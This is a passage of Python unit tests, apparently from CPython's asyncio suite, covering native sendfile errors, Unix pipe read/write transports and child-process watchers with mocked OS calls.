def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, events.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = events.SendfileNotAvailableError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.pause_reading()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_pause_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.pause_reading()
def test_pause_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
tr.pause_reading()
# the second call should do nothing
tr.pause_reading()
def test_resume_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.resume_reading()
def test_resume_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
# the pipe is not paused
# resuming should do nothing
tr.resume_reading()
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
